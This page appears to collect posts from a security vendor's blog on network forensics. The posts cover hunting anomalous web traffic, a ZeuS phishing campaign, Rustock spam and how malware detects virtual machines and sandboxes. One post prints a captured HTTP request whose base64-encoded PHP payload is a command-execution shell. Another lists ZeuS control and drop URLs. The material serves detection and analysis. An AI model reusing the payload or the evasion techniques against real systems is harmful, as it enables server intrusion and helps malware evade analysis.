Finding injection attacks by looking for injection attacks is a fail

code, forensics, injection, Network Forensics, Network Visbility, Obfuscated traffic No Comments

I tend to be an opponent of looking for bad stuff by using “known bad dictionaries” like IP lists, signatures, etc. I tend to soapbox about how you can find far more known and unknown bad stuff by employing a methodology of separating out “presumed good” stuff, and examining outliers. Check out any of the other posts I have up here for more detail about this, probably starting with this post.

The InfoSec industry tends to focus very hard on the exploitation of clients (mostly being end-users belonging to an organization, or customers of your organization – especially for financial institutions). Since the early 2000′s gradually less focus has been paid to the exploitation of servers.

As discussed in other posts here, the exact same forensics methodologies and logical reasoning apply not only to the high-level analysis of network traffic, but also to low-level areas like the characteristics of processes on a host. Likewise, the same techniques apply to finding bad things with hosts as well as with servers.

In this case, we were interested in finding anomalous inbound traffic going from clients to web servers. The logic we used went something like this:

1 – Most people browse webpages using a common web browser like Internet Explorer, Firefox, Safari, Chrome, etc.

2 – The user-agents of these browsers are based on Mozilla 4.0 or 5.0.

So in this case, we were interested in sessions not matching the characteristics above. Those sessions are depicted here:

 

 

While that’s a lot of results (that are mostly legitimate), we could have stopped there and applied the “if-then” logic we talk about in other articles to find the same types of activity we’ll see in a minute, but for the sake of discussion here, we also went one step further.

In this case we were hunting for a more specific type of activity, so we added the following criteria to our logic:

3 – When hacking a website using an exploitation method where automation makes the process more efficient (for instance, SQL injection), many times it’s easier to automate your hacking using a high-level language like Perl, etc.

We were able to combine the above logic into a single query as shown next:

 

 

The above query simply says “show us all network sessions where the user-agent contains the term perl.”

In many environments/traffic sets, this is all you need to find “interesting” things, however in massive environments with custom-developed web applications it’s likely that query will still clutter your analysis work with too many legitimate sessions to analyze. In those cases, it’s useful to layer in the following logic, which is a natural part of the “if-then” logic we talk about in other places.

1 – Because the server farm examined in this case resides in the United States and the customers of this application were primarily US-based, you can filter out all traffic originating from the United States (or whatever country applies to your case). Keep in mind, this would normally still include a massive amount of traffic, but we’ve already applied the filter to only include sessions were the user-agent contains the word perl. The combination of the two criteria points typically reduces the number of sessions from millions to dozens.

2 – When using the logic above, it’s helpful to additionally apply a filter for all sessions where the source country could not be resolved. This is a neat little trick to quickly filter out all traffic from RFC 1918 addresses, which typically means traffic sourced from the organization being examined – especially if you’re looking for bad things coming in. (We apply this logic all the time when looking for bad things going out as well – except in those cases we filter traffic where the destination country can’t be resolved. While this logic doesn’t apply to all cases, it’s a good place to start for most.)

In this case, we ended up with the following eight sessions:

 

 

All eight of those sessions came from the same source. Digging into all sessions from this source (which included several others not part of the eight above, but stood out like a sore thumb after we found those eight – which is typically how it works), we found a lot of traffic like this:

 

POST /contactus.php HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: <redacted>
User-Agent: Mozilla/3.0 (OS/2; U)
Content-Type: application/x-www-form-urlencoded
Content-Length: 996
<redacted>&name=[php]eval(base64_decode('ZWNobyAiQU5BU0tJPGJyPiI7DQp
lY2hvICJzeXM6Ii5waHBfdW5hbWUoKS4iPGJyPiI7DQokY21kPSJlY2hvIEpGcnkiOw0KJGVzZWd1aWNt
ZD1leCgkY21kKTsNCmVjaG8gJGVzZWd1aWNtZDsNCmZ1bmN0aW9uIGV4KCRjZmUpew0KJHJlcyA9ICcnO
w0KaWYgKCFlbXB0eSgkY2ZlKSl7DQppZihmdW5jdGlvbl9leGlzdHMoJ2V4ZWMnKSl7DQpAZXhlYygkY2
ZlLCRyZXMpOw0KJHJlcyA9IGpvaW4oIlxuIiwkcmVzKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHM
oJ3NoZWxsX2V4ZWMnKSl7DQokcmVzID0gQHNoZWxsX2V4ZWMoJGNmZSk7DQp9DQplbHNlaWYoZnVuY3Rp
b25fZXhpc3RzKCdzeXN0ZW0nKSl7DQpAb2Jfc3RhcnQoKTsNCkBzeXN0ZW0oJGNmZSk7DQokcmVzID0gQ
G9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aX
N0cygncGFzc3RocnUnKSl7DQpAb2Jfc3RhcnQoKTsNCkBwYXNzdGhydSgkY2ZlKTsNCiRyZXMgPSBAb2J
fZ2V0X2NvbnRlbnRzKCk7DQpAb2JfZW5kX2NsZWFuKCk7DQp9DQplbHNlaWYoQGlzX3Jlc291cmNlKCRm
ID0gQHBvcGVuKCRjZmUsInIiKSkpew0KJHJlcyA9ICIiOw0Kd2hpbGUoIUBmZW9mKCRmKSkgeyAkcmVzI
C49IEBmcmVhZCgkZiwxMDI0KTsgfQ0KQHBjbG9zZSgkZik7DQp9fQ0KcmV0dXJuICRyZXM7DQp9'))%3B
die%28%29%3B%5B%2Fphp%5D

 

When we remove the encoded data for a moment and clean it up, we see the user is submitting the following in the form of a POST to contactus.php:

 

[php]eval(base64_decode('<encoded_data>'));die();[/php]

 

Even without being a php programmer, it’s fairly obvious to see the attacker is using PHP injection to get the php form contactus.php to execute something encoded inside the eval() statement. And what is inside that eval statement?

It’s decoded below:

 

 

After looking at the other sessions we see the connection with Anaski (pictured below) is not coincidental, as it usually is not with groups like them.

Again, this is just another fun example of how intelligent and tactical traffic carving methods turn up far more than you’d find going out and looking for specific things.

 

 

 

- Gary Golomb

 

 

Using WinDbg to Begin Reverse Engineering Unknown Malware from Memory

Advanced Threats, code, forensics, malware, Malware Analysis, Network Forensics, network forensics, PE EXE files, Reverse Engineering, trojan 4 Comments

Part Two in a multi-part series on holistic, multi-disciplinary analysis and reversing.

 

The last post, “Mutex Analysis: The Canary in the Coal Mine,” started off showing to use mutexes to discover malware that is difficult to locate using more traditional methods and tools. We used a live compromised system for the example and the post came to a relatively abrupt end when it seemed that we stumbled onto a new/unknown type of malware – or at least one that does not seem to have any public exposure or analysis. This post is “part 2″ of our analysis.
 
Update 6/21/2011:
 
This post has been moved to the “Forensics and Reversing” section of the website. I apologize for the inconvenience. Read the full article here.

 

Mutex Analysis: The Canary in the Coal Mine (and Discovering New Families of Malware?)

Advanced Threats, code, forensics, hacked, malware, Malware Analysis, Network Forensics, network forensics, Reverse Engineering, trojan 2 Comments

Part One in a multi-part series on holistic, multi-disciplinary analysis and reversing.

This post is based on a presentation I gave at the last Thotcon, but was really prompted by a case from a couple days ago. It’s an interesting example of how the same disciplined methodologies for finding malicious traffic on the network also applies to sophisticated situations on the host as well. We’ll examine those methodologies and logic on the host by examining a little app I wrote called LockPick, pictured  here and detailed later in this article. As we’ll see, mutex analysis is a VERY powerful way of analyzing systems during Incident Response. They can lead the direction of your analysis when other automated methods fail to do so.
 
Update 6/21/2011:
 
This post has been moved to the “Forensics and Reversing” section of the website. I apologize for the inconvenience. Read the full article here.

 

Dissecting the CVE-2011-0611 Flash Player Zero Day – Part 1

Advanced Threats, apt No Comments

Within the past few days,  We’ve seen the emergence of a new zero-day attack that involves flash files embedded into word documents.   These have purportedly been used in an attempt to compromise machines belonging to government-affiliated persons, as detailed here:

http://krebsonsecurity.com/2011/04/new-adobe-flash-zero-day-being-exploited/

http://contagiodump.blogspot.com/2011/04/apr-8-cve-2011-0611-flash-player-zero.html

As detailed in previous posts,  NetWitness tries to stay away from “signature” based detection of these types of attacks, and instead look for indicators that point to something that is not the norm.

In this particular case, we took a sample of the zero-day attack, and ran it through a NextGen system that is configured with some of the malware detection parser technology that is part of our Spectrum Malware Analysis product.

Even with no prior knowledge of this attack, we are immediately alerted to the presence of an XOR encoded executable in the session:

Because the use of XOR to obfuscate executable content is common in the malware world, we’ve chosen to have this alert into our highest Risk Category.

Additionally,  our forensic fingerprinting parsers identify the content in this session as containing executable content, as well as flash content, which appears to be a Flash version 10 swf file, despite the “.doc” filename.

So in this case, even if we weren’t aware of the *specific* attacks, a NextGen user would have been notified of the attack because of the collection of “abnormal” network activities.

Since we’ve determined that this is an incident that warrants further investigation.  We can use the data-extract function to extract the word document for further analysis:

 

Which allows us access to the fully reconstructed doc for further analysis:

 

Who needs signatures, when you have NetWitness!   More to follow involving malware analysis of the extracted samples.

- Alex Cox, Principal Research Analyst

 

ZeuS and SpyEye Merge! Business as usual for NetWitness Users!

Uncategorized 1 Comment

There has been a lot of talk over the past few months about the rumored merger of ZeuS and SpyEye, two popular banking trojans that have been used by cybercrimals to commit fraud against consumers and businesses.

This is detailed in Brian Kreb’s blog here:

http://krebsonsecurity.com/2011/02/revisiting-the-spyeyezeus-merger/

While ultimately this appeals to many people’s interest in the “sex, drugs and rock and roll” aspect of the underground economy and its parallels with traditional organized crime, it is in reality, business as usual.

Much like a modern business, the criminal underground works under a development life-cycle model.   Mergers occur.   New innovations and technology emerge.  Collaboration happens.

What that means in the grand scheme of cyber-security is this:   You’ve got to be agile, and more importantly, understand your network and connected systems.  The bad guys will be one step ahead of you until you can do this.

Here’s an example.   NetWitness tracks botnets and malware families as part of our routine day-to-day business.   This practice is good for essentially two things.  Being able to cover items that are popular media fodder for the inevitable “What are we doing about this?” question from your CISO, as well as understanding the common methodology used by cybercriminals in the pursuit of their business. Ultimately, it is largely a game of “whack-a-mole”.

The really “fun stuff” is discovered when you start comparing your traffic against what is known good, and looking for outliers.    Here’s an example put together by a couple of our senior analysts, Gary Golomb (Malware Research) and Mike Sconzo (Professional Services), whose day-to-day jobs involve ferreting intrusions out in very large networks.

In this case, Mike wrote a flex parser which analyzes header elements in an HTTP session, and identifies things that are abnormal or that don’t match the RFC for properly formed HTTP header entries.   When it sees this, it creates an alert entry in the NextGen framework that identifies the issue.

Gary then combined this parser logic with the idea of using a watchlist on countries and file extensions.   He focused on countries that we commonly see involved with trojan and cybercrime activity:

afghanistan
belarus
bosnia and herzegovina
bulgaria
cayman islands
china
croatia
czech republic
egypt
georgia
india
kazakhstan
kyrgyzstan
latvia
libyan arab jamahiriya
lithuania
netherlands
nigeria
oman
pakistan
plaestinian territory
qatar
romania
russian federation
satellite provider
saudi arabia
serbia
singapore
slovakia
slovenia
syrian arab republic
trinidad and tobago
turkey
turks and caicos islands
ukraine
united arab emirates
uzbekistan
yemen

and the following file extensions, all common, but seen with an above average frequency in cybercrime investigations.

exe

cgi

php

bin

rar

zip

pdf

txt

jar

js

In plain-language, this essentially asks the NextGen framework to:

“Show me only those sessions that have unusual http header combinations, from watchlist countries with these ten file extensions”

What Gary found was that of the millions of sessions that he started with, this three part “pivot” reduced those sessions to about 180.   Of those 180, 175 were intrusions.

These 175 consisted of common Trojan activity like ZeuS and SpyEye, but also never seen before cases and custom malware.

So when it comes to detecting malware families, who cares?   Can you detect what’s unusual for YOUR network?   That’s where the good stuff is hiding.

Happy Hunting!

Alex Cox, Principal Research Analyst

Life at NetWitness…

Uncategorized No Comments

Sometimes – even I have to admit working at NetWitness is quite a unique experience.  Because of what we do, the company has a very open culture.  Our Internet connections always have various deployments of our products on them, and our engineering staff is encouraged to use them for monitoring.  Today I posted a couple of pictures to a friend on Facebook.  Within minutes, I received the following from a colleague:  ”Hey – check out the new Facebook parser!” – along with the attached:

Network Forensics and Reverse Engineering Part 2 – A deeper dive into real JavaScript analysis and reverse engineering

Advanced Threats, code, Decompile, forensics, JavaScript, malware, Malware Analysis, Network Forensics, network forensics, Reverse Engineering 1 Comment

Introduction

In our first post in the forensics and reversing series, we examined why HTTP gzip content encoding is a larger and more serious problem than most people realize. We’ll use the end of the first post as a starting point for analysis in this post. It also serves as an example of something far more important. That is, the very heart of forensics – and something I’d propose is the very definition of forensics. I teach a network forensics and reversing class together with Mike Sconzo about once a month. This is a point I raise at least a dozen times a day in class. That is:

World class forensics engineers are the ones who quickly and intelligently reduce millions of sessions to about a dozen worthy of deeper analysis.

What constitutes quickly? I suppose it depends on the tool being used to perform the analysis, but I’d generalize by saying no more than a couple minutes and/or the same number of clicks. We’ll see this in a moment.

What constitutes intelligently? We can answer this question by looking at a host-based forensics analogy. Suppose you were given a hard disk of a compromised machine and you needed to find the malware. There could be millions of files on the computer, so where do you start? Most of the time, especially for most standard compromises, the following steps will work (this is an over-generalization, but one that works nonetheless):

  1. Show only PE files (exe, dll, etc..). At this point you’ve probably gone from nearly a million to about 100,000.
  2. Show only PE files outside the Program Files directory. Here you may go from about a hundred thousand files to tens of thousands.
  3. Depending on the assumed time of compromise, show only those PE files modified or created in a specific range of days. At this point you should go from tens of thousands to less than 100.
  4. Since malware tends to be smaller in size, show only those PE files less than 500k. At this point you should be looking at only a handful of files, and most of the time, the malware you’re looking for will be one of them.

In the above steps, you found malware NOT by looking for known traits of malware. You did it by examining general characteristics about file traits. In other words, by examining characteristics external to the file, not by searching for signatures or other characteristics internal to the file. Typically, each of those traits by themselves are completely uninteresting until they are combined with other “uninteresting” traits, making them very interesting when layered together.

As you’ll see next, the same applies to network traffic. We can intelligently go from millions of sessions to only a few by wisely layering traits of network sessions with little attention paid to what is inside those sessions.

Read the full and detailed post here:
http://www.networkforensics.com/forensics-and-reverse-engineering-series/

Gary Golomb

Welcome Back, Rustock.

Uncategorized 3 Comments

It seems that our holiday from rustock-generated spam is over.

http://bits.blogs.nytimes.com/2011/01/06/spamming-declines-at-least-temporarily/?partner=rss&emc=rss

We monitor a number of botnets at NetWitness and check them occasionally for new information.  Since Rustock is in the news, we’ve paid close attention to it recently.   Sometime this morning, Rustock begain spamming again,  pushing viagra from shady .ru sites.

Looking at the traffic in Investigator,  I see a quick overview of subject lines:

And reconstructed, we see a very in-depth message of “CLICK HERE!”

Which of course takes us to Canadian Pharmacy!

Welcome back Rustock…We can’t say we’ve missed you.   There is no telling if this will be continued activity, but appears to be business as usual for the Rustock operators.

Cyber-Crime or Cyber-Espionage?

Advanced Threats, apt, cybercrime, kneber, Uncategorized, zeus 5 Comments

Brian Krebs posted an article on his blog this morning that documents a recent spam attack on U.S. government employees that occurred around christmas time.

http://krebsonsecurity.com/2011/01/white-house-ecard-dupes-dot-gov-geeks/

which has in-depth technical coverage at:

http://contagiodump.blogspot.com/2011/01/general-file-information-file-card.html

Using a very simple ruse of “Merry Christmas from the White House”, this message used the common “ecard” social engineering hook to push a ZeuS trojan variant to the unlucky recipient.

From a configuration standpoint, this ZeuS bot used the following command and control points, all of which are down as of this writing:

Configuration Files:

http://patmarclean.us/flash/resny.bin

http://rogersvillechamber.us/components/tmpny.bin

http://ingunnanvik.no/templates/system/sysny.bin

http://argentum.lv/modules/rssny.bin

Binary Updates:

http://ingunnanvik.no/templates/system/botny.exe

Information Drops:

http://209.172.60.242/~newdowni/stat/gate_in.php

http://someonesome.mobi/imgs_ctn/icon_sml/gate_in.php

http://shock-world.mobi/zs/tmp/gate.php

It was poised to collect credentials from most major banks, but also includes site such as ebay, myspace, and microsoft, as well as online-payment processors, paypal and e-gold.

While these facts alone show similarities to infrastructure aspects of the “kneber” compromise that we documented back in February 2010, a very specific tie-in makes us believe that this attack was driven by operators that were also a part of the initial “kneber” compromise.

One domain in the original kneber data, “updatekernel.com” was tied specifically to a phishing email that used a spoofed address to push ZeuS to targeted government-employees, which Brian details here:

http://krebsonsecurity.com/2010/02/zeus–attack–spoofs–nsa–targets–gov–and–mil/

An interesting sidenote to this particular aspect of the kneber data was that the ZeuS bot that was involved with this phish had a second stage download of an executable called “stat.exe”. This malware was revealed to be a perl script converted to a stand-alone executable with the perl2exe tool.

This malware searched the local harddrive of the victim PC for xls,doc and pdf files, and uploaded them via FTP to:

packupdate.com

Which at the time, resided on a server in Belarus.

This current spam run, also downloaded a second-stage executable, called “pack.exe”, which was also:

- A perl2exe exectuable
- Searched the victim PC for all xls, doc and pdf files
- Uploaded stolen information to a server in Belarus, which resolved to “uploadpack.org”

So in this case, we have two executables, and three domain names, that have three converging elements, (pack, belarus and perl2exe)

When compared, these two files, separated by almost a year, are nearly identical in size:

Furthermore when analyzed with HBGary’s “fingerprint” tool, which looks for code similarities and “toolmarks”, a 95.8% match is indicated, with the only differing factors being the CPUID of the machine on which the malware was compiled:

This, because it is such a small and fairly unknown aspect of the kneber compromise, makes us think that this is indeed the same operator, who is again after documents pertaining to U.S. Government activities.

This evidence shows the continuing convergence of cyber-crime and cyber-espionage activites, and how they occassionally mirror or play off one another.

The question again, which we posed in our initial Kneber document, is:

Who is the end consumer of this information?

Alex Cox, Principal Research Analyst

VM Detection by In-The-Wild Malware

Advanced Threats, code, malware, Malware Analysis 1 Comment

 

Motivation

 

A large number of security researchers use Virtual Machines when analyzing malware and/or setting up both active and passive honeynets. There a numerous reasons for this, including: scalability, manageability, configuration and state snapshots, ability to run diverse operating systems, etc..

Malware that attempts to detect if it’s running in a Virtual Machine (then change its behavior accordingly to prevent analysis by security people) is not a subject of academic fancy. A recent search of VirusTotal showed they receive at least 1,000 unique samples a week with VM detection capabilities. (This search was performed by searching for known function import names from non-standard DLLs.) Personally, my first encounter with malware that behaved completely differently inside a Virtual Machine (from a real host) was approximately eight years ago.

VM detection does not apply just to the realm of APT-level malware. Agobot/Gaobot/PhatBot  is a family of massively deployed malware first released in 2004 with the ability to detect if running in either VMware or VirtualPC and changes its behavior accordingly. Considering just this example of how old and low-entry malware (with such a massive deployment) performs these actions, our attention to this subject should be especially keen.

Notes

 

1 – This post contains a number of techniques for VM detection used by malware, along with code demonstrating how simple these techniques are to implement. Except where noted, all techniques are currently used in the wild.

2 – Most of this post (but not all) is a summary of other people’s work, not mine – except where noted. References are given and should be accurate. If not, email me and I’ll correct.

3 – Examples where simple code samples could not be produced will not be considered here.

Only techniques that are difficult to mitigate are examined here. I’m sure there are hundreds of other ways to detect VM’s. Of the methods I’m familiar with, these were the ones that stood out in my mind as being difficult to fight.

Types of Virtual Machines

 

Generally speaking, there are three types of Virtual Machines. They are:

1 – Hardware Assisted – aka: Hypervisors – These VM’s use processor-specific instructions to cause the Host OS to [in effect] “fork,” where the original copy of the OS stays in a suspended state while the newly spawned “Guest copy” continues to run as if nothing happened. The important thing to keep in mind relative to this topic is that when the Guest executes machine level instructions, the actual hardware CPU is used to execute those instructions.

2 – Reduced Privilege – These are the VM’s most people are familiar with and use regularly. Here, the Host takes more of an active “proxy” role for the Guest by virtualizing important data structures and registers, then performing some level of translation services for some machine level instructions. Relative to this topic, the important thing to note here is that the guest – in effect – runs at a lower privilege than if it was truly controlling the CPU.

3 – Pure Software – Software VM’s act as full proxies to the CPU by implementing a truly virtual CPU the Guest interacts with.

Hypervisors (Hardware Assisted VMs)

 

Xen > 3.x and Virtual Server 2005 are a couple examples of Hardware assisted virtual machines.

Low-level detection of being virtualized in one of these environments is extremely difficult. Many people still call it impossible. While several people have talked publically about proof of concept code developed to detect these environments for years, none has been released or found in wild (that I’m aware of). Because of this, I will not talk about hypervisors any further than describing why detection is so difficult. (Since we have no code to examine how simple it is – the point of this post.)

A Hypervisor “guest” can be launched at any point after the OS has loaded. In preparation for launching a guest copy of the OS, the “host” sets up some basic CPU-specific control structures, then uses a single instruction (opcode) to cause the CPU to place the Host OS in a virtualized state while the Guest is basically a “forked copy” of the originally running OS. Once a Hypervisor has started running, the Guest OS basically has zero knowledge of this fact since all access to hardware is direct access. While the access to hardware is direct, the Hypervisor VM itself still has the ability to intercept interesting events – even before the Host OS has seen them. In this effect, a hypervisor VM is more powerful than both the Host and Guest OS’s because it sees everything before either of them.  Also, once a hypervisor is running, no others can become active. The first hypervisor VM has absolute control.

All methods for detecting the presence of Hypervisors depend on timing functions, however they are only useful techniques in theory because of the infeasibility of creating a good baseline to compare timing results to in order to make a pass/fail decision. Another technique uses context switching to cause Translation Lookaside Buffers filled with a predetermined pattern of data to get flushed when a hypervisor is running. Describing the technique is far beyond the scope of this paper since there is no exploit code to examine, but… Based on my understanding of the following article, I’m not sure the technique is so relevant anymore anyways. http://download.intel.com/technology/itj/2006/v10i3/v10-i3-art01.pdf

VMware

 

The non-ESX versions of VMware are reduced privilege VMs, and because of that are trivial to detect. Because critical data structures setup by the Operating System in critical regions of memory during OS start-up are already in use by the Host OS, VMware must relocate virtual copies of them for use by the Guest OS. This fact alone presents several powerful opportunities to detect when running inside a VMware image.

The first example simply checks the base address of the Interrupt Descriptor Table, as shown below. If then IDT is at a location much higher than its normal location, the process is likely inside a VM. This technique is generally attributed to Joanna Rutkowska , and is described here.

Code:

  In the above example, line #6 is the single line of assembly it takes to get the base address of the IDT, which is then tested a couple lines below that. SIDT is an instruction that stores the contents of the interrupt descriptor table register (IDTR) in the destination operand. It’s important to note this instruction is an unprivileged instruction that can be executed at any privilege level. However, according to the paper, “Detecting the Presence of Virtual Machines Using the Local Data Table,” verifying the IDT on multi-processor systems will fail when there is an IDT for each microprocessor. If that detection technique wasn’t simple enough, the next one is. VMware builds the Local Descriptor Table in memory, however Windows does not. Therefore, simply checking for a non-zero address for the LDT when running in Windows is enough to identify VMware.

On line #6, SLDT is the assembly instruction to store the segment selector from the local descriptor table register (LDTR) in the destination operand. It’s important to note this instruction is also an unprivileged instruction that can be executed at any privilege level!

Another interesting feature of VMware is seen when executing the IN instruction from user-land of common OSs like Linux, Windows, etc (and more accurately, when executing this instruction in ring3). IN is the “Input from Port” instruction. It copies the value from the I/O port specified with the source operand to the destination operand.  The IN instruction is a privileged instruction which cannot be run from ring3 (user-land), therefore when executed, an exception should be thrown. However, when VMware is running, no exception is generated if a special input port is specified. That port is “0×5658,” aka: “VX.” This technique is described in much more detail in the original posting here.

Example code is below, with comments added to explain each step.

Some people writing for SANS have said that disabling certain configuration option in VMware will defeat this type of detection mechanism. Unfortunately, the real IN instruction would never change any register other than EAX in the first place, so all the other register changes that take place when executing the instruction in VMware are still detectable. Other counter-measures have been proposed, however they are too unstable and unusable in the real world for us to consider here.

VirtualPC

  VirtualPC is also a reduced privilege VM, like non-ESX versions of VMware, and is just as trivial to detect. The IDT and LDT table structures tests described in the VMware section apply to VirtualPC as-is. In fact, those tests apply to all the big-name VMs that people are most familiar with in the Reduced Privilege category of VMs. VirtualPC has functionality similar to VMware’s use of the IN instruction, however it uses illegal instructions to trigger exceptions the kernel will catch. For example, issuing the following machine code would normally cause an exception because it’s an undefined opcode: 0F 3F 0A 00 But, with VirtualPC running, no exception is generated because this is part of VirtualPC’s guest to host communication protocol. Therefore, the code in the VMware example can simply be modified to issue this opcode, then test for a lack of exception. A more interesting feature of VirtualPC is its use of “buffered code emulation.” Buffered code emulation is the practice of copying an instruction from a Guest into a host-controlled buffer and executing it there, then returning the results to the Guest. As VirtualPC is intercepting every instruction and deciding what to return back to the caller, it will sometimes alter or craft its own results – as it does with the CPUID instruction. Normal values retuned are “GenuineIntel” and “AuthenticAMD.” With VirtualPC, the result is “ConnectixCPU.” But, I like this example of VirtualPC detection best since it uses the high-level and easy to use language, C#. Consider the following:

The above example pulls the manufacturer name of the motherboard and tests if it’s “Microsoft Corporation.” If it is, then VirtualPC has just been detected.

Software VMs

 

Examples software VMs include Bochs, Hydra, QEMU, Atlantis, and Norman Sandbox, among many others. Because software VMs try to fully emulate hardware, there are too many techniques to detect them to list here. Because it would be nearly impossible to implement every instruction and match the quirks each instruction has on different families of processors, most of the tests for Software VM’s revolve around testing some of the more arcane instructions.

Sandboxes

 

I personally love sandboxes because of the sheer volume of work they automate and standardization of data they return. I can’t even imagine life before they existed anymore! :-) However, we need to be realistic about the fact that most (but not all!) are trivial to detect, regardless of hardware platform. This doesn’t mean we should avoid them – it just means we need to ensure we’re compensating for that fact.

A technique I have not seen elsewhere and have used in my own “research” malware in the past is to check the DLLs that have been loaded into my program’s space. To use this technique, you must first create a “fingerprint” of the DLLs your program loads. This is easily accomplished with a couple lines of debug code after you have finished your program. The technique is easy and can be used even in high-level languages like C#. Consider the following:

bool checkName(string nameOfLoadedDLL) is a method that returns true if the dll mapped in the program’s process space is known to belong to the “fingerprint” of this program. If the dll mapped in is unknown to the program, then it returns false and the logic below is executed.

This simple function is enough to catch many sandboxes (again, not all of them), even if you’ve followed their best practices and rename their monitoring dll (typically injected into all new processes).  Other examples of sandbox detection include using the hook detection employed by numerous security programs to find malware (except in this case – used by malware to detect sandboxes), counting hooks, etc..

Unfortunately, in the case of sandboxes, malware doesn’t even need to go through all that trouble to defeat them. The only thing malware needs to do is ensure its persistence through a reboot, then wait for a reboot to take place. That alone is enough to defeat the analysis steps of most analysis!

Summary

 

In short, you have seen that while many people quibble over VM detection being as simple as looking for registry keys and mac addresses (all easily mitigated from a security perspective), VM detection is actually:

  1. Much easier than programmatically dealing with the registry
  2. Much harder [nearly impossible] to mitigate when behavior of hardware is the target of testing
  3. Happens on a massive scale in malware in the wild

 

While the use of Virtual Machines has many advantages for research purposes, their selection and limitations should be carefully weighed against your actual objectives.

Gary Golomb

« Previous Entries